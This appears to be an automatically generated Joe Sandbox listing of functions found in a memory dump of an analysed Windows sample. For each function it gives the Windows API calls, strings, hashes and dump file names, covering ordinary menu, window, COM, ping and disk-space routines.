Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction ID: 4a24588d7cd50b7c62f5e55fb6255880a20605ec8ba3a436c0a003d902a75baa
Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
Instruction Fuzzy Hash: F97117B6A00717BBEB24EF68DD81B5AB3B8AF45364F148239F514D7281E770DE048B90

Function 00A72527 Relevance: 16.7, APIs: 11, Instructions: 190windowsleepCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00A72542
GetMenuItemInfoW.USER32(00AD5890,000000FF,00000000,00000030), ref: 00A725A3
SetMenuItemInfoW.USER32(00AD5890,00000004,00000000,00000030), ref: 00A725D9
Sleep.KERNEL32(000001F4), ref: 00A725EB
GetMenuItemCount.USER32(?), ref: 00A7262F
GetMenuItemID.USER32(?,00000000), ref: 00A7264B
GetMenuItemID.USER32(?,-00000001), ref: 00A72675
GetMenuItemID.USER32(?,?), ref: 00A726BA
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00A72700
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A72714
SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A72735

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountRadioSleep_memset
String ID:
API String ID: 4176008265-0
Opcode ID: 6d8ab806e28b5cea6693e07cc891fb63ede2f6806e6aeabfb31578518ae5ae35
Instruction ID: bf621677b2a46aee5e851f0585af41d60082f87500d1ab4416937b380e8e5f93
Opcode Fuzzy Hash: 6d8ab806e28b5cea6693e07cc891fb63ede2f6806e6aeabfb31578518ae5ae35
Instruction Fuzzy Hash: 57619170900249AFDB15CFA4DD84EBE7BB8EB45344F14C16AE846A3251D731AD06DB20

Function 00A96F23 Relevance: 16.7, APIs: 11, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A96FA5
SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A96FA8
GetWindowLongW.USER32(?,000000F0), ref: 00A96FCC
_memset.LIBCMT ref: 00A96FDD
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A96FEF
SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A97067

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$LongWindow_memset
String ID:
API String ID: 830647256-0
Opcode ID: 7360a8e0364f76263012c6f0dfb7da4df84f6449403c1303d104f71f2dd0bc1a
Instruction ID: 1b46538f314bf83ecdd98df9e31a2349b2a4bbd6bd0e64aa22bfa0368d115ee2
Opcode Fuzzy Hash: 7360a8e0364f76263012c6f0dfb7da4df84f6449403c1303d104f71f2dd0bc1a
Instruction Fuzzy Hash: A7615D75A00208AFDB11DFA4CD81EEE77F8EF09710F10415AFA15AB2A1C771AD45DBA0

Function 00A66B98 Relevance: 16.6, APIs: 11, Instructions: 123memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00A66BBF
SafeArrayAllocData.OLEAUT32(?), ref: 00A66C18
VariantInit.OLEAUT32(?), ref: 00A66C2A
SafeArrayAccessData.OLEAUT32(?,?), ref: 00A66C4A
VariantCopy.OLEAUT32(?,?), ref: 00A66C9D
SafeArrayUnaccessData.OLEAUT32(?), ref: 00A66CB1
VariantClear.OLEAUT32(?), ref: 00A66CC6
SafeArrayDestroyData.OLEAUT32(?), ref: 00A66CD3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A66CDC
VariantClear.OLEAUT32(?), ref: 00A66CEE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00A66CF9

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: 7ccb8ebe70008a5bb813867c6b182349c4d20fa8830d59ecb858fe08043e77eb
Instruction ID: d305578a48a9b8f1225d4c282b1c4955b8dd4839a3c85784d6cd63d90dfe714c
Opcode Fuzzy Hash: 7ccb8ebe70008a5bb813867c6b182349c4d20fa8830d59ecb858fe08043e77eb
Instruction Fuzzy Hash: E2413075A00219DFCF04DFA9D9849EEBBB9FF48354F008069E955E7261DB30A946CF90

Function 00A85732 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00A85793
inet_addr.WSOCK32(?,?,?), ref: 00A857D8
gethostbyname.WSOCK32(?), ref: 00A857E4
IcmpCreateFile.IPHLPAPI ref: 00A857F2
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00A85862
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00A85878
IcmpCloseHandle.IPHLPAPI(00000000), ref: 00A858ED
WSACleanup.WSOCK32 ref: 00A858F3

Strings

Ping, xrefs: 00A85816

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: d0cc8878bee0c9da302b4608e07beba267ed1b0078ba7b77a9125068d09db902
Instruction ID: 617cf4d64d02e5d27a32bc9c988372eb50cbdb74588ba36398e8b67af457c042
Opcode Fuzzy Hash: d0cc8878bee0c9da302b4608e07beba267ed1b0078ba7b77a9125068d09db902
Instruction Fuzzy Hash: 80518E31A04600DFDB10EF75DD45B6A77E4EF48710F14492AF996DB2A1DB30E941DB42

Function 00A7B4C3 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 98COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00A7B4D0
GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00A7B546
GetLastError.KERNEL32 ref: 00A7B550
SetErrorMode.KERNEL32(00000000,READY), ref: 00A7B5BD

Strings

READONLY, xrefs: 00A7B588
READY, xrefs: 00A7B596
INVALID, xrefs: 00A7B58F
UNKNOWN, xrefs: 00A7B575
NOTREADY, xrefs: 00A7B57C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: b359df8cc0d0077cd2e6b46b74ac7002ac823c2d7be59b0b51c166a655b218e1
Instruction ID: e9bfa501610df7f79a8cf824cb03f36d7c796f626d9cb3ced3af8ce0ed80e39e
Opcode Fuzzy Hash: b359df8cc0d0077cd2e6b46b74ac7002ac823c2d7be59b0b51c166a655b218e1
Instruction Fuzzy Hash: 8D316375A00205EFCB00DB68CD45FAE7BB4FF48311F14C166E50ADB291DB719A46CB61

Function 00A68F8F Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 82windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00A69014
GetDlgCtrlID.USER32 ref: 00A6901F
GetParent.USER32 ref: 00A6903B
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A6903E
GetDlgCtrlID.USER32(?), ref: 00A69047
GetParent.USER32(?), ref: 00A69063
SendMessageW.USER32(00000000,?,?,00000111), ref: 00A69066

Strings

ListBox, xrefs: 00A68FD1
ComboBox, xrefs: 00A68F9C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: c6f8087827f87e3aed7d2d2e773a468cb959810f44312859327ee779d25ea448
Instruction ID: 352b19e635cd9b416f0f5125c6d596c0c3d4ef9a2f472dd86f905a953efe8052
Opcode Fuzzy Hash: c6f8087827f87e3aed7d2d2e773a468cb959810f44312859327ee779d25ea448
Instruction Fuzzy Hash: 5A21B374A00208BFDF05EBA0CC85EFEBBB9EF59310F10415ABA619B2A1DF755855DB20

Function 00A6907A Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A17DE1: _memmove.LIBCMT ref: 00A17E22

Part of subcall function 00A6AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00A6AABC

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00A690FD
GetDlgCtrlID.USER32 ref: 00A69108
GetParent.USER32 ref: 00A69124
SendMessageW.USER32(00000000,?,00000111,?), ref: 00A69127
GetDlgCtrlID.USER32(?), ref: 00A69130
GetParent.USER32(?), ref: 00A6914C
SendMessageW.USER32(00000000,?,?,00000111), ref: 00A6914F

Strings

ListBox, xrefs: 00A690BC
ComboBox, xrefs: 00A69087

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: MessageSend$CtrlParent$ClassName_memmove
String ID: ComboBox$ListBox
API String ID: 1536045017-1403004172
Opcode ID: c95785b43f5b9b8672d8679e04efb536e2a7de3848668be7d336e8baab205cce
Instruction ID: 6cbc8f35cde5411bdd1fb6ee1e89ba414f136011e8c7f0555ad707e60e253ad6
Opcode Fuzzy Hash: c95785b43f5b9b8672d8679e04efb536e2a7de3848668be7d336e8baab205cce
Instruction Fuzzy Hash: 2B21C5B5A00208BFDF01EBE4CC85EFEBBB8EF55300F504116BA11972A1DB755855DB20

Function 00A69163 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 00A6916F
GetClassNameW.USER32(00000000,?,00000100), ref: 00A69184
_wcscmp.LIBCMT ref: 00A69196
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00A69211

Strings

largeicons, xrefs: 00A691A5
details, xrefs: 00A691BF
smallicons, xrefs: 00A691D9
list, xrefs: 00A691F3
SHELLDLL_DefView, xrefs: 00A69190

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: 8df285f39b97e09b716b1377199430de0a8ea63c7fcf31c17bf086bfc35ab637
Instruction ID: e182552027c9f7b04ae83afe886768f6d9a8054186f7443de22b1ade2fccc580
Opcode Fuzzy Hash: 8df285f39b97e09b716b1377199430de0a8ea63c7fcf31c17bf086bfc35ab637
Instruction Fuzzy Hash: 0C11C676288307BAFA112674DC1BEEB3BBCAB15720F31052BFA10E54D1FF7168515A94

Function 00A888AB Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00A888D7
CoInitialize.OLE32(00000000), ref: 00A88904
CoUninitialize.OLE32 ref: 00A8890E
GetRunningObjectTable.OLE32(00000000,?), ref: 00A88A0E
SetErrorMode.KERNEL32(00000001,00000029), ref: 00A88B3B
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00AA2C0C), ref: 00A88B6F
CoGetObject.OLE32(?,00000000,00AA2C0C,?), ref: 00A88B92
SetErrorMode.KERNEL32(00000000), ref: 00A88BA5
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00A88C25
VariantClear.OLEAUT32(?), ref: 00A88C35

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: 512d357158c1d4bbff0c58349506f774a10dd8a9a893373515a36fdee3adc07e
Instruction ID: cfea55028db173b913cb7a78e04e2d09ebc7badf9ed1d6fce4f27b9b6168ff7e
Opcode Fuzzy Hash: 512d357158c1d4bbff0c58349506f774a10dd8a9a893373515a36fdee3adc07e
Instruction Fuzzy Hash: ACC112B1608305AFC700EF68C88496BB7E9FF89348F40495DF98A9B251DB75ED06CB52

Function 00A77990 Relevance: 15.3, APIs: 10, Instructions: 292COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00A77A6C

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ArraySafeVartype
String ID:
API String ID: 1725837607-0
Opcode ID: 2e7e10807b2b0e40261c4d117b495e3c6addd2dab4e37a5e72adb83e3a7f7ad3
Instruction ID: a8041b36332dff12f16e4b56abd2203d2c0beb573a049d98447e2e15a6478bcf
Opcode Fuzzy Hash: 2e7e10807b2b0e40261c4d117b495e3c6addd2dab4e37a5e72adb83e3a7f7ad3
Instruction Fuzzy Hash: 34B19D71A0420A9FDB01DFA4CC95BBEB7F4EF49321F20C429E649EB251D734A941CB91

Function 00A711CE Relevance: 15.1, APIs: 10, Instructions: 89threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00A711F0
GetForegroundWindow.USER32(00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A71204
GetWindowThreadProcessId.USER32(00000000), ref: 00A7120B
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A70268,?,00000001), ref: 00A7121A
GetWindowThreadProcessId.USER32(?,00000000), ref: 00A7122C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A70268,?,00000001), ref: 00A71245
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00A70268,?,00000001), ref: 00A71257
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A7129C
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A712B1
AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00A70268,?,00000001), ref: 00A712BC

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 09ccca895183c002d0c3b8808d89d2c218db66959f914b4ee3e12ab7bdb73dc6
Instruction ID: b2f8bbfd3e05cb6ea9addd4db0d9e1017567ef0666efd80421af6b2798eab8ba
Opcode Fuzzy Hash: 09ccca895183c002d0c3b8808d89d2c218db66959f914b4ee3e12ab7bdb73dc6
Instruction Fuzzy Hash: A9317175601704BFDF20DF98EC88FA977E9EB59311F20C126F909D61A1EB749D418B90

Function 00A1FA5D Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 264comCOMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00A1FAA6
OleUninitialize.OLE32(?,00000000), ref: 00A1FB45
UnregisterHotKey.USER32(?), ref: 00A1FC9C
DestroyWindow.USER32(?), ref: 00A545D6
FreeLibrary.KERNEL32(?), ref: 00A5463B
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00A54668

Strings

close all, xrefs: 00A1FAA1

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 1a3249e7c172d0af51bb413b9771a7ae39c29de7e8cda2aa16fadee6d4d55b8c
Instruction ID: f7cbd83d2388c230bd2641816c0f991801f2d2992921a031b4af099a268805c9
Opcode Fuzzy Hash: 1a3249e7c172d0af51bb413b9771a7ae39c29de7e8cda2aa16fadee6d4d55b8c
Instruction Fuzzy Hash: 82A18134705212CFCB19EF14CA95BA9F364BF09755F1442ADE80AAB261DB30ED96CF90

Function 00A6A068 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 241COMMON

Download Yara Rule

APIs

EnumChildWindows.USER32(?,00A6A439), ref: 00A6A377

Strings

CLASS, xrefs: 00A6A0F6
REGEXPCLASS, xrefs: 00A6A13C
INSTANCE, xrefs: 00A6A285
NAME, xrefs: 00A6A1A9
CLASSNN, xrefs: 00A6A119
TEXT, xrefs: 00A6A2AE

Memory Dump Source

Source File: 00000000.00000002.1332986548.0000000000A11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A10000, based on PE: true

Associated: 00000000.00000002.1332968165.0000000000A10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000A9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333034122.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333080838.0000000000ACE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AD9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1333101514.0000000000AED000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a10000_XeFYBYYj0w.jbxd

Similarity

API ID: ChildEnumWindows
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
API String ID: 3555792229-1603158881
Opcode ID: b327d15c03f3ba1ee4503568e6b0fc162b5431324202449d7c5c634b4097db34
Instruction ID: 021a0b2f49fa15933d412c0f805c86e291a81d4e16e323362a9567bcde86575e
Opcode Fuzzy Hash: b327d15c03f3ba1ee4503568e6b0fc162b5431324202449d7c5c634b4097db34
Instruction Fuzzy Hash: DF91A331A04606AACB08DFB0C552BEEFBB8FF24340F549119E85AB7251DF316999CF91

Function 00A12E26 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 186windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00A12EAE

Part of subcall function 00A11DB3: GetClientRect.USER32(?,?), ref: 00A11DDC
Part of subcall function 00A11DB3: GetWindowRect.USER32(?,?), ref: 00A11E1D
Part of subcall function 00A11DB3: ScreenToClient.USER32(?,?), ref: 00A11E45

GetDC.USER32 ref: 00A4CD32
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00A4CD45
SelectObject.GDI32(00000000,00000000), ref: 00A4CD53
SelectObject.GDI32(00000000,00000000), ref: 00A4CD68
ReleaseDC.USER32(?,00000000), ref: 00A4CD70
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00A4CDFB

Strings

U, xrefs: 00A4CCD0

Memory Dump Source

